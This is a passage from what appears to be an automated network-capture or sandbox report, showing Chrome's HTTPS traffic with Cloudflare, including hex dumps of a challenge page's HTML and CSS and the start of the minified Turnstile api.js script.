                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                  document-policy: js-profiling
                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  cross-origin-embedder-policy: require-corp
                                                                                  referrer-policy: same-origin
                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  2024-10-02 15:49:43 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 35 64 38 31 35 39 63 65 35 31 38 35 64 2d 45 57 52 0d 0a 0d 0a
                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8cc5d8159ce5185d-EWR
                                                                                  2024-10-02 15:49:43 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                  Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                  Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                  Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                  Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                  Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                  Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                  Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                  Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.449763104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:43 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:44 UTC441INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:43 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 47262
                                                                                  Connection: close
                                                                                  accept-ranges: bytes
                                                                                  last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                  access-control-allow-origin: *
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d815c80b8cdc-EWR
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                  Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 72 29 7b 76 61 72 20 61 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 66 3b 74 72 79 7b 66 6f 72 28 61 3d 61 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                  Data Ascii: t(e){if(Array.isArray(e))return e}function Bt(e,r){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,f;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 73 5b 30 5d 26 26 28 61 3d 30 29 29 2c 61 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                  Data Ascii: ])}}function p(s){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,s[0]&&(a=0)),a;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 29 29 3b 76 61 72 20 56 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 56 65 7c 7c 28 56 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 3d 22 66 61 69 6c 75 72 65 2d 66 65 65 64 62 61 63 6b 22 2c 65 2e 46 41 49
                                                                                  Data Ascii: ));var Ve;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ve||(Ve={}));var Se;(function(e){e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVING_TROUBLES="failure-having-troubles",e.FAILURE_FEEDBACK="failure-feedback",e.FAI
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 41 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c 31 30 30 7d 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 29 7b 72 65 74 75 72 6e
                                                                                  Data Ascii: unction L(e,r){return e.indexOf(r)!==-1}function nt(e){return L(["auto","dark","light"],e)}function it(e){return L(["auto","never"],e)}function ot(e){return e>0&&e<9e5}function ct(e){return e>0&&e<36e4}var Ar=/^[0-9A-Za-z_-]{3,100}$/;function Xt(e){return
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 79 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 65 72 3d 38 65 33 2c 62 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 74 72 3d 33 2c 72 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 43 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 4e 72 3d 5b 22 61 72 2d 65 67 22 2c 22 65 73 2d 65 73 22 2c 22 63 73 2d 63 7a
                                                                                  Data Ascii: allenge_response",yt="cf-turnstile-response",_t="g-recaptcha-response",er=8e3,bt="private-token",tr=3,rr=500,ar=500,Y="0/0";var Cr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],Nr=["ar-eg","es-es","cs-cz
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 61 26 26 72 3f 22 35 34 30 70 78 22 3a 61 26 26 6f 3f 22 35 30 30 70 78 22 3a 61 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 72 28 65 2c 72 29 7b 69 66 28 21 55 28 65 2c
                                                                                  Data Ascii: rFeedback,o=e.isModeratelyVerbose;return a&&r?"540px":a&&o?"500px":a?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function nr(e,r){if(!U(e,
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 6f 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 49 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 7d 72 65 74 75 72 6e 20
                                                                                  Data Ascii: f(o===null||!or(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Ie(o,arguments,ce(this).constructor)}return
